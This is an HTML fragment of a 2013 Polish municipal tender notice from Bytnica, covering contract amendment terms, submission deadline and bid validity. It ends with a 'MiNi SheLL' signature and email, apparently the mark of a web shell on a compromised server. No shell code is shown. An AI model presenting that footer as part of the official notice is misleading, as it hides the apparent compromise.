e) wystąpi zmiana Wykonawcy w przypadku sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek),
f) wystąpi konieczność zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę,
g) w przypadku wystąpienia niesprzyjających warunków pogodowych, uniemożliwiających wykonanie części lub całości umowy w ustalonym terminie,
h) w razie konieczności dokonania innej zmiany dokumentacji projektowej (np. w razie ujawnienia potrzeby wykonania robót zamiennych).
3. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać:
1. opis zmiany,
2. uzasadnienie zmiany,
3. koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4. czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
5. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności, tylko i wyłącznie, o których mowa powyżej, w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bytnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Bytnicy
66-630 bytnica 52
pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2013 godzina 14:00, miejsce: Sekretariat Urzędu Gminy w Bytnicy, 66-630 Bytnica 52.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com